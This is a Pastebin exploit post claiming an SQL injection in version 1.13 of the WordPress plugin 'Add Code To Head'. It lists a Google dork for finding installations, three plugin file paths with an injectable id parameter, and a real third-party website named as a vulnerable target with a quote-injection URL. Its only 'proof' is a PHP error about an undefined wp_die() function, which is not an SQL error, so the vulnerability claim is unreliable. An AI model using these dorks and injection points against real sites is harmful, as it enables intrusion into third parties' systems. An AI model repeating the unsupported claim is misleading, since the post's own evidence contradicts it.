Advertisement
KingSkrupellos

WordPress Add Code To Head Plugins 1.13 SQL Injection

Jan 27th, 2019
554
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.75 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : WordPress Add Code To Head upsite_analytics_plugin Plugins 1.13 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 28/01/2019
  7. # Vendor Homepage : hbjitney.com
  8. # Software Download Link : downloads.wordpress.org/plugin/add-code-to-head.zip
  9. # Software Information Link : wordpress.org/plugins/add-code-to-head/
  10. # Software Version : 1.13
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:''/wp-content/plugins/upsite_analytics_plugin/''
  15. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  16. Special Elements used in an SQL Command ('SQL Injection') ]
  17.  
  18. ####################################################################
  19.  
  20. # Description :
  21. ***************
  22.  
  23. “WordPress Add Code To Head upsite_analytics_plugin” is open source software for WordPress.
  24.  
  25. ####################################################################
  26.  
  27. # Impact :
  28. ***********
  29.  
  30. * WordPress Add Code To Head upsite_analytics_plugin Plugins 1.13 is prone to an
  31.  
  32. SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied
  33.  
  34. data before using it in an SQL query.
  35.  
  36. * Exploiting this issue could allow an attacker to compromise the application, read,
  37.  
  38. access or modify data, or exploit latent vulnerabilities in the underlying database.
  39.  
  40. If the webserver is misconfigured, read & write access to the filesystem may be possible.
  41.  
  42. ####################################################################
  43.  
  44. # SQL Injection Exploit :
  45. **********************
  46.  
  47. /wp-content/plugins/upsite_analytics_plugin/add-code-to-head.php?id=[SQL Injection]
  48.  
  49. /wp-content/plugins/upsite_analytics_plugin/plugin-updates/github-checker.php?id=[SQL Injection]
  50.  
  51. /wp-content/plugins/upsite_analytics_plugin/uninstall.php?id=[SQL Injection]
  52.  
  53. ####################################################################
  54.  
  55. # Example Vulnerable Site :
  56. *************************
  57.  
  58. [+] tramhaltevenlo.nl/wp-content/plugins/upsite_analytics_plugin/add-code-to-head.php?id=1%27
  59.  
  60. ####################################################################
  61.  
  62. # SQL Database Error :
  63. ********************
  64.  
  65. Fatal error: Uncaught Error: Call to undefined function wp_die() in
  66. /home/tramhaltevenlo/public_html/wp-content/plugins/upsite_analytics_plugin
  67. /uninstall.php:9 Stack trace: #0 {main} thrown in /home/tramhaltevenlo/public_html
  68. /wp-content/plugins/upsite_analytics_plugin/uninstall.php on line 9
  69.  
  70. ####################################################################
  71.  
  72. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  73.  
  74. ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement